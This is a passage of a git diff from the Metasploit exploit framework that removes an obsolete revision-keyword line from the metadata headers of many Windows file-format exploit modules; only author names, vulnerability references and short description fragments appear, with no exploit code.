a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb @@ -38,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Jeremy Conway ', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1240' ], diff --git a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb index fc04b7cd5c..c4c3d7d7ca 100644 --- a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb +++ b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Felipe Andres Manzano ', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3953' ], diff --git a/modules/exploits/windows/fileformat/adobe_utilprintf.rb b/modules/exploits/windows/fileformat/adobe_utilprintf.rb index 2d05034954..47c0519311 100644 --- a/modules/exploits/windows/fileformat/adobe_utilprintf.rb +++ b/modules/exploits/windows/fileformat/adobe_utilprintf.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC', 'Didier Stevens ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-2992' ], diff --git a/modules/exploits/windows/fileformat/altap_salamander_pdb.rb b/modules/exploits/windows/fileformat/altap_salamander_pdb.rb index 824c124d37..554470b5cf 100644 --- a/modules/exploits/windows/fileformat/altap_salamander_pdb.rb +++ b/modules/exploits/windows/fileformat/altap_salamander_pdb.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'patrick' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3314' ], diff --git a/modules/exploits/windows/fileformat/aol_desktop_linktag.rb b/modules/exploits/windows/fileformat/aol_desktop_linktag.rb index 5b8e649847..9dfe139221 100644 --- a/modules/exploits/windows/fileformat/aol_desktop_linktag.rb +++ b/modules/exploits/windows/fileformat/aol_desktop_linktag.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote results arbitrary code execution. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'sup3r', #Initial disclosure, poc (9.5) diff --git a/modules/exploits/windows/fileformat/aol_phobos_bof.rb b/modules/exploits/windows/fileformat/aol_phobos_bof.rb index 68d3be74a6..d25a283f2e 100644 --- a/modules/exploits/windows/fileformat/aol_phobos_bof.rb +++ b/modules/exploits/windows/fileformat/aol_phobos_bof.rb @@ -51,7 +51,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Trancer ' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '61964'], diff --git a/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb b/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb index 3c078bdfbf..9ac8e2435e 100644 --- a/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb +++ b/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'MC', # Original Metasploit Module 'corelanc0d3r ', # Added DEP Bypass support ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-0257' ], diff --git a/modules/exploits/windows/fileformat/audio_wkstn_pls.rb b/modules/exploits/windows/fileformat/audio_wkstn_pls.rb index dfcf0cd944..dadaab71fd 100644 --- a/modules/exploits/windows/fileformat/audio_wkstn_pls.rb +++ b/modules/exploits/windows/fileformat/audio_wkstn_pls.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'germaya_x', 'dookie', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0476' ], diff --git a/modules/exploits/windows/fileformat/audiotran_pls.rb b/modules/exploits/windows/fileformat/audiotran_pls.rb index 793ce2c331..eca075b44d 100644 --- a/modules/exploits/windows/fileformat/audiotran_pls.rb +++ b/modules/exploits/windows/fileformat/audiotran_pls.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Sebastien Duquette', 'dookie', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0476'], diff --git a/modules/exploits/windows/fileformat/bacnet_csv.rb b/modules/exploits/windows/fileformat/bacnet_csv.rb index 2960bca19e..d8cfd14680 100644 --- a/modules/exploits/windows/fileformat/bacnet_csv.rb +++ b/modules/exploits/windows/fileformat/bacnet_csv.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Jeremy Brown', 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '68096'], diff --git a/modules/exploits/windows/fileformat/blazedvd_plf.rb b/modules/exploits/windows/fileformat/blazedvd_plf.rb index eb640a2176..349256f801 100644 --- a/modules/exploits/windows/fileformat/blazedvd_plf.rb +++ b/modules/exploits/windows/fileformat/blazedvd_plf.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE' , '2006-6199' ], diff --git a/modules/exploits/windows/fileformat/ca_cab.rb b/modules/exploits/windows/fileformat/ca_cab.rb index b19626ac79..d53b6c425c 100644 --- a/modules/exploits/windows/fileformat/ca_cab.rb +++ b/modules/exploits/windows/fileformat/ca_cab.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-2864' ], diff --git a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb index 0f14bd4895..1f31b9fc8a 100644 --- a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb +++ b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancek ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5405' ], diff --git a/modules/exploits/windows/fileformat/csound_getnum_bof.rb b/modules/exploits/windows/fileformat/csound_getnum_bof.rb index 11390576f6..4a14c0fb5c 100644 --- a/modules/exploits/windows/fileformat/csound_getnum_bof.rb +++ b/modules/exploits/windows/fileformat/csound_getnum_bof.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Secunia', # Vulnerability discovery 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-0270' ], diff --git a/modules/exploits/windows/fileformat/cytel_studio_cy3.rb b/modules/exploits/windows/fileformat/cytel_studio_cy3.rb index 8be23ef070..d76a4955da 100644 --- a/modules/exploits/windows/fileformat/cytel_studio_cy3.rb +++ b/modules/exploits/windows/fileformat/cytel_studio_cy3.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Luigi Auriemma', # Initial Discovery/PoC 'James Fitts ' # Metasploit Module (Thx Juan & Jeff) ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '75991' ], diff --git a/modules/exploits/windows/fileformat/deepburner_path.rb b/modules/exploits/windows/fileformat/deepburner_path.rb index 2f007f5a3b..91b9a591b7 100644 --- a/modules/exploits/windows/fileformat/deepburner_path.rb +++ b/modules/exploits/windows/fileformat/deepburner_path.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'fl0 fl0w', # re-discovered 2009/2010 'jduck' # metasploit version ], - 'Version' => '$Revision$', 'References' => [ [ 'BID', '21657' ], diff --git a/modules/exploits/windows/fileformat/destinymediaplayer16.rb b/modules/exploits/windows/fileformat/destinymediaplayer16.rb index 43e7bb44a4..da45606895 100644 --- a/modules/exploits/windows/fileformat/destinymediaplayer16.rb +++ b/modules/exploits/windows/fileformat/destinymediaplayer16.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancek ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3429' ], diff --git a/modules/exploits/windows/fileformat/digital_music_pad_pls.rb b/modules/exploits/windows/fileformat/digital_music_pad_pls.rb index 6b121cd9e7..ef60960341 100644 --- a/modules/exploits/windows/fileformat/digital_music_pad_pls.rb +++ b/modules/exploits/windows/fileformat/digital_music_pad_pls.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Abhishek Lyall ' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '68178' ], diff --git a/modules/exploits/windows/fileformat/djvu_imageurl.rb b/modules/exploits/windows/fileformat/djvu_imageurl.rb index 27e8f12282..cfdf5a1d77 100644 --- a/modules/exploits/windows/fileformat/djvu_imageurl.rb +++ b/modules/exploits/windows/fileformat/djvu_imageurl.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'dean ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4922' ], diff --git a/modules/exploits/windows/fileformat/dvdx_plf_bof.rb b/modules/exploits/windows/fileformat/dvdx_plf_bof.rb index d6ecd78cac..6e919aa73e 100644 --- a/modules/exploits/windows/fileformat/dvdx_plf_bof.rb +++ b/modules/exploits/windows/fileformat/dvdx_plf_bof.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote Windows XP SP2/SP3, Windows Vista, and Windows 7. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'n00b', #Initial discovery, poc for 4.1 diff --git a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb index 5a2183ea3e..be3d67f758 100644 --- a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb +++ b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '58423'], diff --git a/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb b/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb index ac991de8fc..55b8a624fc 100644 --- a/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb +++ b/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'TecR0c ', # msf 'mr_me ', # msf ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-3494' ], diff --git a/modules/exploits/windows/fileformat/etrust_pestscan.rb b/modules/exploits/windows/fileformat/etrust_pestscan.rb index b0ce32e406..c65ed5d322 100644 --- a/modules/exploits/windows/fileformat/etrust_pestscan.rb +++ b/modules/exploits/windows/fileformat/etrust_pestscan.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4225' ], diff --git a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb index d55033e499..26bf67ace8 100644 --- a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb +++ b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck', #Metasploit 'Lincoln', #Complete Metasploit port ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1028' ], diff --git a/modules/exploits/windows/fileformat/fatplayer_wav.rb b/modules/exploits/windows/fileformat/fatplayer_wav.rb index 916088f462..7e12557da4 100644 --- a/modules/exploits/windows/fileformat/fatplayer_wav.rb +++ b/modules/exploits/windows/fileformat/fatplayer_wav.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'James Fitts ', # Original Exploit 'dookie', # Metasploit Module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4962'], diff --git a/modules/exploits/windows/fileformat/fdm_torrent.rb b/modules/exploits/windows/fileformat/fdm_torrent.rb index 2c51c2d35a..73f15b7e87 100644 --- a/modules/exploits/windows/fileformat/fdm_torrent.rb +++ b/modules/exploits/windows/fileformat/fdm_torrent.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'SkD ', 'jduck', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0184' ], diff --git a/modules/exploits/windows/fileformat/feeddemon_opml.rb b/modules/exploits/windows/fileformat/feeddemon_opml.rb index 19c8168ac8..466c1e6749 100644 --- a/modules/exploits/windows/fileformat/feeddemon_opml.rb +++ b/modules/exploits/windows/fileformat/feeddemon_opml.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'dookie', # MSF Module 'jduck' # SEH + AlphanumMixed fixes ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0546' ], diff --git a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb index 6696027c20..25142e6fad 100644 --- a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb +++ b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'bannedit', # metasploit module 'Chris Evans' # Initial discovery and exploit ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '71104' ], diff --git a/modules/exploits/windows/fileformat/foxit_reader_launch.rb b/modules/exploits/windows/fileformat/foxit_reader_launch.rb index a698daff98..52b05457f3 100644 --- a/modules/exploits/windows/fileformat/foxit_reader_launch.rb +++ b/modules/exploits/windows/fileformat/foxit_reader_launch.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Francisco Falcon', # Discovery 'bannedit' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE' , '2009-0837' ], diff --git a/modules/exploits/windows/fileformat/foxit_title_bof.rb b/modules/exploits/windows/fileformat/foxit_title_bof.rb index 897330913c..703d1c5640 100644 --- a/modules/exploits/windows/fileformat/foxit_title_bof.rb +++ b/modules/exploits/windows/fileformat/foxit_title_bof.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote NOTE: This exploit does not use javascript. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'dookie', # Discovered the bug diff --git a/modules/exploits/windows/fileformat/galan_fileformat_bof.rb b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb index 113d07e126..5bd79077df 100644 --- a/modules/exploits/windows/fileformat/galan_fileformat_bof.rb +++ b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Jeremy Brown <0xjbrown41[at]gmail.com>', 'loneferret', ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '60897' ], diff --git a/modules/exploits/windows/fileformat/gta_samp.rb b/modules/exploits/windows/fileformat/gta_samp.rb index a4103c5980..26f6865d40 100644 --- a/modules/exploits/windows/fileformat/gta_samp.rb +++ b/modules/exploits/windows/fileformat/gta_samp.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Silent_Dream', # Original discovery, MSF Module, template by mona.py ], - 'Version' => '$Revision$', 'References' => [ [ 'EDB', '17893' ] diff --git a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb index 054393ef84..0edfc9e4fd 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'bratax', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-0564'], diff --git a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb index 8295791a0b..d084fe8c90 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'bratax', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-0564' ], diff --git a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb index d15483845e..0238ae08ac 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Encrypt3d.M!nd', 'loneferret', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0133' ], diff --git a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb index b33b0ef633..f4087fa832 100644 --- a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb +++ b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'His0k4', 'jduck', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-2485' ], diff --git a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb index f94285b8e8..7fad269596 100644 --- a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb +++ b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Dr_IDE', 'dookie', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4265' ], diff --git a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb index 8819f805dc..12f4b03f30 100644 --- a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb +++ b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'mr_me ', # msf-fu 'juan vazquez' # more improvements ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-0897' ], diff --git a/modules/exploits/windows/fileformat/lotusnotes_lzh.rb b/modules/exploits/windows/fileformat/lotusnotes_lzh.rb index dc28eb83c3..7ecc6aecb5 100644 --- a/modules/exploits/windows/fileformat/lotusnotes_lzh.rb +++ b/modules/exploits/windows/fileformat/lotusnotes_lzh.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'binaryhouse.net', # original discovery 'alino <26alino[at]gmail.com>', # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2011-1213'], diff --git a/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb b/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb index 33a1a30c5b..fc25548054 100644 --- a/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb +++ b/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'acidgen', #found the vulnerability 'corelanc0d3r ' #rop exploit + msf module ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '72063'], diff --git a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb index 0f4ced0650..232faab382 100644 --- a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb +++ b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.metasploit.com' ], diff --git a/modules/exploits/windows/fileformat/mediajukebox.rb b/modules/exploits/windows/fileformat/mediajukebox.rb index a8aaaba83b..67d6978345 100644 --- a/modules/exploits/windows/fileformat/mediajukebox.rb +++ b/modules/exploits/windows/fileformat/mediajukebox.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Ron Henry ', 'dijital1', ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '55924' ], diff --git a/modules/exploits/windows/fileformat/microp_mppl.rb b/modules/exploits/windows/fileformat/microp_mppl.rb index c143231544..ef372786a8 100644 --- a/modules/exploits/windows/fileformat/microp_mppl.rb +++ b/modules/exploits/windows/fileformat/microp_mppl.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'James Fitts ' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '73627'], diff --git a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb index 78391484f9..85c74d3458 100644 --- a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb +++ b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Molotov ', 'dookie', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '56574' ], diff --git a/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb b/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb index 305ebe9b4d..9620228327 100644 --- a/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb +++ b/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Tiago Henriques', # metasploit module 'James Fitts ' # clean ups ], - 'Version' => '$Revision$', 'References' => [ [ 'EDB', '14373' ], diff --git a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb index 3f47b80324..6f6214a760 100644 --- a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb +++ b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'rick2600', #found the vulnerabilities 'corelanc0d3r ', #rop exploit + msf module ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '72101'], diff --git a/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb b/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb index 073dd829de..76cc8d3cf9 100644 --- a/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb +++ b/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'rick2600', #found the vulnerabilities 'corelanc0d3r ', #rop exploit + msf module ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '72102'], diff --git a/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb index d8f0f163f3..3e0b1b480f 100644 --- a/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb +++ b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-4742' ], diff --git a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb index c3e4fcba29..baa446304c 100644 --- a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb +++ b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Jacques Louw', # Vulnerability Discovery and PoC 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'BID', '49149' ], diff --git a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb index 7c5a716b1d..e0486db53c 100644 --- a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb +++ b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb @@ -36,7 +36,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Sean Larsson', # original discovery 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE','2009-3129' ], diff --git a/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb b/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb index 31b0ac24a0..74c9a6c491 100644 --- a/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb +++ b/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Snake', # PoC 'jduck' # metasploit version ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0033' ], diff --git a/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb b/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb index 118cead5c0..a9bb8d19dd 100644 --- a/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb +++ b/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb @@ -42,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck', # Metasploit module 'DJ Manila Ice, Vesh, CA' # more office 2007 for the lulz ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-3333' ], diff --git a/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb b/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb index 477595c952..c12b817625 100644 --- a/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb +++ b/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Yaniv Miron aka Lament of ilhack', 'jduck' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-3970' ], diff --git a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb index 36056b85b1..7e40c4f300 100644 --- a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb +++ b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote user the user. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Aniway', #Initial discovery (via ZDI) diff --git a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb index 4cdd53cd92..dd317eecd0 100644 --- a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb +++ b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-4776' ], diff --git a/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb b/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb index 40156484ac..e7b2940bc7 100644 --- a/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb +++ b/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'dean ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE','2008-1898' ], diff --git a/modules/exploits/windows/fileformat/mymp3player_m3u.rb b/modules/exploits/windows/fileformat/mymp3player_m3u.rb index 9e8002f843..6d14021cfc 100644 --- a/modules/exploits/windows/fileformat/mymp3player_m3u.rb +++ b/modules/exploits/windows/fileformat/mymp3player_m3u.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'n3w7u', # original 'm_101' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '64580'], diff --git a/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb b/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb index e8171379bd..98d938812d 100644 --- a/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb +++ b/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote This exploit does not use javascript. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'corelanc0d3r ', diff --git a/modules/exploits/windows/fileformat/orbital_viewer_orb.rb b/modules/exploits/windows/fileformat/orbital_viewer_orb.rb index 